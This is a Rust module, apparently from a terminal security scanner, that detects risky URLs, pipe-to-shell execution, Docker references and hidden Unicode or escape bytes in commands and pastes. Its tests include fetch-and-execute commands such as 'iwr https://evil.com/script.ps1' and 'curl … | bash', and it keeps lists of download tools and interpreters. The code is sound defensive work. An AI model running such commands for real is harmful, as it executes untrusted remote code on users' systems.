1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
/// Situation in which input is being inspected.
///
/// [`tier1_scan`] uses this to pick between the exec and the paste pattern.
#[derive(Clone, Copy, Debug, Eq, PartialEq)]
pub enum ScanContext {
    /// Selects the tier-1 exec pattern.
    Exec,
    /// Selects the tier-1 paste pattern.
    Paste,
}
15
16#[allow(dead_code)]
18mod tier1_generated {
19 include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
20}
21
22pub fn extractor_ids() -> &'static [&'static str] {
24 tier1_generated::EXTRACTOR_IDS
25}
26
27static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
29 Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
30});
31
32static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
34 Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
35});
36
37static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
39 Regex::new(
40 r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
41 )
42 .expect("url regex must compile")
43});
44
/// Summary of a byte-level scan produced by `scan_bytes`.
///
/// Each flag records whether at least one byte sequence of that category was
/// seen; `details` lists the individual findings in input order.
#[derive(Debug, Clone, Default, PartialEq, Eq)]
pub struct ByteScanResult {
    /// An ESC (`0x1b`) byte was found.
    pub has_ansi_escapes: bool,
    /// A control byte other than `\n`, `\t` and ESC, or DEL (`0x7f`), was found.
    pub has_control_chars: bool,
    /// A Unicode bidirectional control character was found.
    pub has_bidi_controls: bool,
    /// A zero-width character was found.
    pub has_zero_width: bool,
    /// The input as a whole is not valid UTF-8.
    pub has_invalid_utf8: bool,
    /// One entry per suspicious byte sequence.
    pub details: Vec<ByteFinding>,
}

/// A single suspicious byte (or the lead byte of a suspicious character).
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct ByteFinding {
    /// Byte offset of the finding within the scanned input.
    pub offset: usize,
    /// The byte found at `offset`.
    pub byte: u8,
    /// Human-readable description of the finding.
    pub description: String,
}
60
61pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
63 match context {
64 ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
65 ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
66 }
67}
68
69pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
71 let mut result = ByteScanResult {
72 has_ansi_escapes: false,
73 has_control_chars: false,
74 has_bidi_controls: false,
75 has_zero_width: false,
76 has_invalid_utf8: false,
77 details: Vec::new(),
78 };
79
80 if std::str::from_utf8(input).is_err() {
82 result.has_invalid_utf8 = true;
83 }
84
85 let len = input.len();
86 let mut i = 0;
87 while i < len {
88 let b = input[i];
89
90 if b == 0x1b {
92 if i + 1 < len {
93 let next = input[i + 1];
94 if next == b'[' || next == b']' || next == b'_' || next == b'P' {
95 result.has_ansi_escapes = true;
96 result.details.push(ByteFinding {
97 offset: i,
98 byte: b,
99 description: match next {
100 b'[' => "CSI escape sequence",
101 b']' => "OSC escape sequence",
102 b'_' => "APC escape sequence",
103 b'P' => "DCS escape sequence",
104 _ => "escape sequence",
105 }
106 .to_string(),
107 });
108 i += 2;
109 continue;
110 }
111 } else {
112 result.has_ansi_escapes = true;
114 result.details.push(ByteFinding {
115 offset: i,
116 byte: b,
117 description: "trailing escape byte".to_string(),
118 });
119 }
120 }
121
122 if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
124 result.has_control_chars = true;
125 result.details.push(ByteFinding {
126 offset: i,
127 byte: b,
128 description: format!("control character 0x{b:02x}"),
129 });
130 }
131
132 if b == 0x7F {
134 result.has_control_chars = true;
135 result.details.push(ByteFinding {
136 offset: i,
137 byte: b,
138 description: "control character 0x7f (DEL)".to_string(),
139 });
140 }
141
142 if b >= 0xc0 {
144 let remaining = &input[i..];
146 if let Some(ch) = std::str::from_utf8(remaining)
147 .ok()
148 .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
149 .and_then(|s| s.chars().next())
150 {
151 if is_bidi_control(ch) {
153 result.has_bidi_controls = true;
154 result.details.push(ByteFinding {
155 offset: i,
156 byte: b,
157 description: format!("bidi control U+{:04X}", ch as u32),
158 });
159 }
160 if is_zero_width(ch) {
162 result.has_zero_width = true;
163 result.details.push(ByteFinding {
164 offset: i,
165 byte: b,
166 description: format!("zero-width character U+{:04X}", ch as u32),
167 });
168 }
169 i += ch.len_utf8();
170 continue;
171 }
172 }
173
174 i += 1;
175 }
176
177 result
178}
179
/// Returns `true` for Unicode bidirectional formatting controls.
///
/// Covers the Arabic Letter Mark (U+061C), the left-to-right / right-to-left
/// marks (U+200E, U+200F), the embedding and override controls
/// (U+202A..=U+202E) and the isolate controls (U+2066..=U+2069).
fn is_bidi_control(ch: char) -> bool {
    matches!(
        ch,
        '\u{061C}'
            | '\u{200E}'..='\u{200F}'
            | '\u{202A}'..='\u{202E}'
            | '\u{2066}'..='\u{2069}'
    )
}
197
/// Returns `true` for the zero-width characters this scanner reports:
/// U+200B, U+200C, U+200D and U+FEFF.
fn is_zero_width(ch: char) -> bool {
    const ZERO_WIDTH: [char; 4] = ['\u{200B}', '\u{200C}', '\u{200D}', '\u{FEFF}'];
    ZERO_WIDTH.contains(&ch)
}
208
209pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
212 let segments = tokenize::tokenize(input, shell);
213 let mut results = Vec::new();
214
215 for (seg_idx, segment) in segments.iter().enumerate() {
216 for mat in URL_REGEX.find_iter(&segment.raw) {
218 let raw = mat.as_str().to_string();
219 let url = parse::parse_url(&raw);
220 results.push(ExtractedUrl {
221 raw,
222 parsed: url,
223 segment_index: seg_idx,
224 in_sink_context: is_sink_context(segment, &segments),
225 });
226 }
227
228 let is_docker_cmd = segment.command.as_ref().is_some_and(|cmd| {
231 let cmd_lower = cmd.to_lowercase();
232 matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl")
233 });
234 if is_sink_context(segment, &segments) && !is_docker_cmd {
235 for arg in &segment.args {
236 let clean = strip_quotes(arg);
237 if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
238 results.push(ExtractedUrl {
239 raw: clean.clone(),
240 parsed: UrlLike::SchemelessHostPath {
241 host: extract_host_from_schemeless(&clean),
242 path: extract_path_from_schemeless(&clean),
243 },
244 segment_index: seg_idx,
245 in_sink_context: true,
246 });
247 }
248 }
249 }
250
251 if let Some(cmd) = &segment.command {
253 let cmd_lower = cmd.to_lowercase();
254 if matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl") {
255 if let Some(docker_subcmd) = segment.args.first() {
256 let subcmd_lower = docker_subcmd.to_lowercase();
257 if subcmd_lower == "build" {
258 let mut i = 1;
260 while i < segment.args.len() {
261 let arg = strip_quotes(&segment.args[i]);
262 if (arg == "-t" || arg == "--tag") && i + 1 < segment.args.len() {
263 let tag_val = strip_quotes(&segment.args[i + 1]);
264 if !tag_val.is_empty() {
265 let docker_url = parse::parse_docker_ref(&tag_val);
266 results.push(ExtractedUrl {
267 raw: tag_val,
268 parsed: docker_url,
269 segment_index: seg_idx,
270 in_sink_context: true,
271 });
272 }
273 i += 2;
274 } else if arg.starts_with("-t") && arg.len() > 2 {
275 let tag_val = strip_quotes(&arg[2..]);
276 let docker_url = parse::parse_docker_ref(&tag_val);
277 results.push(ExtractedUrl {
278 raw: tag_val,
279 parsed: docker_url,
280 segment_index: seg_idx,
281 in_sink_context: true,
282 });
283 i += 1;
284 } else if let Some(val) = arg.strip_prefix("--tag=") {
285 let tag_val = strip_quotes(val);
286 let docker_url = parse::parse_docker_ref(&tag_val);
287 results.push(ExtractedUrl {
288 raw: tag_val,
289 parsed: docker_url,
290 segment_index: seg_idx,
291 in_sink_context: true,
292 });
293 i += 1;
294 } else {
295 i += 1;
296 }
297 }
298 } else if subcmd_lower == "image" {
299 if let Some(image_subcmd) = segment.args.get(1) {
301 let image_subcmd_lower = image_subcmd.to_lowercase();
302 if matches!(
303 image_subcmd_lower.as_str(),
304 "pull" | "push" | "inspect" | "rm" | "tag"
305 ) {
306 extract_first_docker_image(
307 &segment.args[2..],
308 seg_idx,
309 &mut results,
310 );
311 }
312 }
313 } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
314 extract_first_docker_image(&segment.args[1..], seg_idx, &mut results);
316 }
317 }
318 }
319 }
320 }
321
322 results
323}
324
325#[derive(Debug, Clone)]
327pub struct ExtractedUrl {
328 pub raw: String,
329 pub parsed: UrlLike,
330 pub segment_index: usize,
331 pub in_sink_context: bool,
332}
333
/// Docker options whose value is passed as the *following* argument.
///
/// `extract_first_docker_image` skips the argument after any of these so the
/// option's value is not mistaken for the image reference.
const DOCKER_VALUE_FLAGS: &[&str] = &[
    "--platform", "--format", "--filter", "-f",
    "--label", "-l",
    "--name", "--hostname",
    "--user", "-u",
    "--workdir", "-w",
    "--network", "--net",
    "--env", "-e", "--env-file",
    "--publish", "-p", "--expose",
    "--volume", "-v", "--mount",
    "--add-host", "--device", "--entrypoint",
    "--log-driver", "--log-opt",
    "--restart", "--runtime",
    "--cpus", "--cpu-shares", "--cpu-quota",
    "--memory", "--memory-reservation", "--memory-swap", "--shm-size",
    "--ulimit", "--security-opt", "--sysctl", "--tmpfs", "--gpus",
    "--ipc", "--pid", "--userns", "--cgroupns",
];
383
/// Short Docker options that may carry their value in the same argument
/// (for example `-p8080:80`).
const DOCKER_VALUE_PREFIXES: &[&str] = &[
    "-p", "-e", "-v", "-l", "-u", "-w",
];
386
387fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
389 let mut skip_next = false;
390 for arg in args {
391 if skip_next {
392 skip_next = false;
393 continue;
394 }
395 let clean = strip_quotes(arg);
396 if clean == "--" {
397 break;
398 }
399 if clean.starts_with("--") && clean.contains('=') {
400 continue; }
402 if clean.starts_with('-') {
403 if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
404 skip_next = true;
405 }
406 if DOCKER_VALUE_PREFIXES
407 .iter()
408 .any(|p| clean.starts_with(p) && clean.len() > p.len())
409 {
410 continue;
411 }
412 continue;
413 }
414 if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
415 let docker_url = parse::parse_docker_ref(&clean);
416 results.push(ExtractedUrl {
417 raw: clean,
418 parsed: docker_url,
419 segment_index: seg_idx,
420 in_sink_context: true,
421 });
422 }
423 break; }
425}
426
427fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
429 if let Some(cmd) = &segment.command {
430 let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
431 let cmd_lower = cmd_base.to_lowercase();
432 if is_source_command(&cmd_lower) {
433 return true;
434 }
435 }
436
437 if let Some(sep) = &segment.preceding_separator {
439 if sep == "|" || sep == "|&" {
440 if let Some(cmd) = &segment.command {
442 let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
443 if is_interpreter(cmd_base) {
444 return true;
445 }
446 }
447 }
448 }
449
450 false
451}
452
/// Returns `true` when `cmd` is one of the known source commands.
///
/// The comparison is exact, so callers pass an already lower-cased name.
fn is_source_command(cmd: &str) -> bool {
    const SOURCE_COMMANDS: &[&str] = &[
        // Downloaders and remote copy
        "curl", "wget", "fetch", "scp", "rsync",
        // Version control and remote shells
        "git", "ssh",
        // Container CLIs
        "docker", "podman", "nerdctl",
        // Package managers and toolchains
        "pip", "pip3", "npm", "npx", "yarn", "pnpm", "go", "cargo",
        // PowerShell web requests
        "iwr", "irm", "invoke-webrequest", "invoke-restmethod",
    ];
    SOURCE_COMMANDS.iter().any(|&known| known == cmd)
}
480
/// Returns `true` when `cmd` names a shell or script interpreter.
///
/// The comparison ignores ASCII case, so `IEX` and `Invoke-Expression` are
/// recognised as well as their lower-case spellings.
fn is_interpreter(cmd: &str) -> bool {
    matches!(
        cmd.to_ascii_lowercase().as_str(),
        "sh" | "bash"
            | "zsh"
            | "dash"
            | "ksh"
            | "python"
            | "python3"
            | "node"
            | "perl"
            | "ruby"
            | "php"
            | "iex"
            | "invoke-expression"
    )
}
498
/// Trims surrounding whitespace and removes one pair of matching quotes.
///
/// Only a leading and trailing `"` pair or `'` pair is removed; a lone quote
/// character or mismatched quotes are left untouched.
fn strip_quotes(s: &str) -> String {
    let trimmed = s.trim();
    ['"', '\'']
        .iter()
        .find_map(|&quote| trimmed.strip_prefix(quote)?.strip_suffix(quote))
        .unwrap_or(trimmed)
        .to_string()
}
509
/// Heuristically decides whether `s` is a `host[/path]` written without a scheme.
///
/// The part before the first `/` must:
/// * not start with `-` (that is an option, not a host);
/// * contain a dot and no spaces;
/// * not end in a common file extension (`install.sh` is a file, not a host);
/// * consist of non-empty dot-separated labels, which rules out dotfiles
///   such as `.bashrc`;
/// * end in a purely alphabetic label of 2 to 63 characters.
fn looks_like_schemeless_host(s: &str) -> bool {
    const FILE_EXTS: &[&str] = &[
        ".sh", ".py", ".rb", ".js", ".ts", ".go", ".rs", ".c", ".h", ".txt", ".md", ".json",
        ".yaml", ".yml", ".xml", ".html", ".css", ".tar.gz", ".tar.bz2", ".tar.xz", ".tgz", ".zip",
        ".gz", ".bz2", ".rpm", ".deb", ".pkg", ".dmg", ".exe", ".msi", ".dll", ".so", ".log",
        ".conf", ".cfg", ".ini", ".toml",
    ];

    if s.starts_with('-') {
        return false;
    }
    let host_part = s.split('/').next().unwrap_or(s);
    if !host_part.contains('.') || host_part.contains(' ') {
        return false;
    }

    let host_lower = host_part.to_lowercase();
    if FILE_EXTS.iter().any(|ext| host_lower.ends_with(*ext)) {
        return false;
    }

    // A host name never has an empty label; this rejects `.bashrc`, `a..com`
    // and the bare `.` / `..` path components.
    if host_part.split('.').any(str::is_empty) {
        return false;
    }

    let tld = host_part.rsplit('.').next().unwrap_or(host_part);
    (2..=63).contains(&tld.len()) && tld.chars().all(|c| c.is_ascii_alphabetic())
}
541
/// Returns everything before the first `/` of `s` (all of `s` if there is none).
fn extract_host_from_schemeless(s: &str) -> String {
    let host = match s.find('/') {
        Some(slash) => &s[..slash],
        None => s,
    };
    host.to_string()
}
545
/// Returns `s` from its first `/` onwards, or an empty string if it has no `/`.
fn extract_path_from_schemeless(s: &str) -> String {
    s.find('/')
        .map(|slash| s[slash..].to_string())
        .unwrap_or_default()
}
553
#[cfg(test)]
mod tests {
    use super::*;

    /// Runs the tier-1 pre-filter in exec context.
    fn exec_hit(command: &str) -> bool {
        tier1_scan(command, ScanContext::Exec)
    }

    /// Runs the tier-1 pre-filter in paste context.
    fn paste_hit(text: &str) -> bool {
        tier1_scan(text, ScanContext::Paste)
    }

    /// Extracts URLs from a POSIX command line.
    fn posix_urls(command: &str) -> Vec<ExtractedUrl> {
        extract_urls(command, ShellType::Posix)
    }

    /// Counts the Docker image references extracted from a POSIX command line.
    fn docker_ref_count(command: &str) -> usize {
        posix_urls(command)
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .count()
    }

    #[test]
    fn test_tier1_exec_matches_url() {
        assert!(exec_hit("curl https://example.com"));
    }

    #[test]
    fn test_tier1_exec_no_match_simple() {
        assert!(!exec_hit("ls -la"));
    }

    #[test]
    fn test_tier1_exec_no_match_echo() {
        assert!(!exec_hit("echo hello world"));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_bash() {
        assert!(exec_hit("something | bash"));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_sudo_bash() {
        assert!(exec_hit("something | sudo bash"));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_env_bash() {
        assert!(exec_hit("something | env bash"));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_bin_bash() {
        assert!(exec_hit("something | /bin/bash"));
    }

    #[test]
    fn test_tier1_exec_matches_git_scp() {
        assert!(exec_hit("git clone git@github.com:user/repo"));
    }

    #[test]
    fn test_tier1_exec_matches_punycode() {
        assert!(exec_hit("curl https://xn--example-cua.com"));
    }

    #[test]
    fn test_tier1_exec_matches_docker() {
        assert!(exec_hit("docker pull malicious/image"));
    }

    #[test]
    fn test_tier1_exec_matches_iwr() {
        assert!(exec_hit("iwr https://evil.com/script.ps1"));
    }

    #[test]
    fn test_tier1_exec_matches_curl() {
        assert!(exec_hit("curl https://example.com/install.sh"));
    }

    #[test]
    fn test_tier1_exec_matches_lookalike_tld() {
        assert!(exec_hit("open file.zip"));
    }

    #[test]
    fn test_tier1_exec_matches_shortener() {
        assert!(exec_hit("curl bit.ly/abc"));
    }

    #[test]
    fn test_tier1_paste_matches_non_ascii() {
        assert!(paste_hit("café"));
    }

    #[test]
    fn test_tier1_paste_exec_patterns_also_match() {
        assert!(paste_hit("curl https://example.com"));
    }

    #[test]
    fn test_tier1_exec_no_non_ascii() {
        assert!(!exec_hit("echo café"));
    }

    #[test]
    fn test_byte_scan_ansi() {
        let scan = scan_bytes(b"hello \x1b[31mred\x1b[0m world");
        assert!(scan.has_ansi_escapes);
    }

    #[test]
    fn test_byte_scan_control_chars() {
        let scan = scan_bytes(b"hello\rworld");
        assert!(scan.has_control_chars);
    }

    #[test]
    fn test_byte_scan_bidi() {
        let scan = scan_bytes("hello\u{202E}dlrow".as_bytes());
        assert!(scan.has_bidi_controls);
    }

    #[test]
    fn test_byte_scan_zero_width() {
        let scan = scan_bytes("hel\u{200B}lo".as_bytes());
        assert!(scan.has_zero_width);
    }

    #[test]
    fn test_byte_scan_clean() {
        let scan = scan_bytes(b"hello world\n");
        assert!(!scan.has_ansi_escapes);
        assert!(!scan.has_control_chars);
        assert!(!scan.has_bidi_controls);
        assert!(!scan.has_zero_width);
    }

    #[test]
    fn test_extract_urls_basic() {
        let found = posix_urls("curl https://example.com/install.sh");
        assert_eq!(found.len(), 1);
        assert_eq!(found[0].raw, "https://example.com/install.sh");
    }

    #[test]
    fn test_extract_urls_pipe() {
        let found = posix_urls("curl https://example.com/install.sh | bash");
        assert!(!found.is_empty());
        assert!(found[0].in_sink_context);
    }

    #[test]
    fn test_extract_urls_scp() {
        let found = posix_urls("git clone git@github.com:user/repo.git");
        assert!(!found.is_empty());
        assert!(matches!(found[0].parsed, UrlLike::Scp { .. }));
    }

    #[test]
    fn test_extract_docker_ref() {
        assert_eq!(docker_ref_count("docker pull nginx"), 1);
    }

    #[test]
    fn test_extract_powershell_iwr() {
        let found = extract_urls(
            "iwr https://example.com/script.ps1 | iex",
            ShellType::PowerShell,
        );
        assert!(!found.is_empty());
    }

    #[test]
    fn test_strip_quotes_single_char() {
        assert_eq!(strip_quotes("\""), "\"");
        assert_eq!(strip_quotes("'"), "'");
    }

    #[test]
    fn test_strip_quotes_empty() {
        assert_eq!(strip_quotes(""), "");
    }

    #[test]
    fn test_scan_bytes_bel_vt_del() {
        // BEL, VT, FF and DEL must all count as control characters.
        let samples: [&[u8]; 4] = [
            b"hello\x07world",
            b"hello\x0Bworld",
            b"hello\x0Cworld",
            b"hello\x7Fworld",
        ];
        for sample in samples.iter() {
            assert!(scan_bytes(sample).has_control_chars);
        }
    }

    #[test]
    fn test_scan_bytes_osc_apc_dcs() {
        // OSC, APC and DCS introducers must all count as escape sequences.
        let samples: [&[u8]; 3] = [
            b"hello\x1b]0;title\x07world",
            b"hello\x1b_dataworld",
            b"hello\x1bPdataworld",
        ];
        for sample in samples.iter() {
            assert!(scan_bytes(sample).has_ansi_escapes);
        }
    }

    #[test]
    fn test_schemeless_long_tld() {
        assert!(looks_like_schemeless_host("example.academy"));
        assert!(looks_like_schemeless_host("example.photography"));
    }

    #[test]
    fn test_segment_index_correct() {
        let found = posix_urls("curl https://a.com | wget https://b.com");
        assert!(found.iter().all(|url| url.segment_index <= 1));
    }

    #[test]
    fn test_docker_build_context_not_image() {
        assert_eq!(
            docker_ref_count("docker build ."),
            0,
            "build context '.' should not be treated as image"
        );
    }

    #[test]
    fn test_docker_image_subcmd() {
        assert_eq!(docker_ref_count("docker image pull nginx"), 1);
    }

    #[test]
    fn test_tier1_module_boundary_enforcement() {
        assert!(
            !tier1_generated::EXTRACTOR_IDS.is_empty(),
            "EXTRACTOR_IDS must not be empty"
        );

        let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
        let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
        assert!(exec_count > 0, "Must have exec fragments");
        assert!(
            paste_count >= exec_count,
            "Paste fragments must be superset of exec fragments"
        );

        // Both generated patterns must compile on their own.
        Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
            .expect("Generated exec pattern must be valid regex");
        Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
            .expect("Generated paste pattern must be valid regex");
    }
}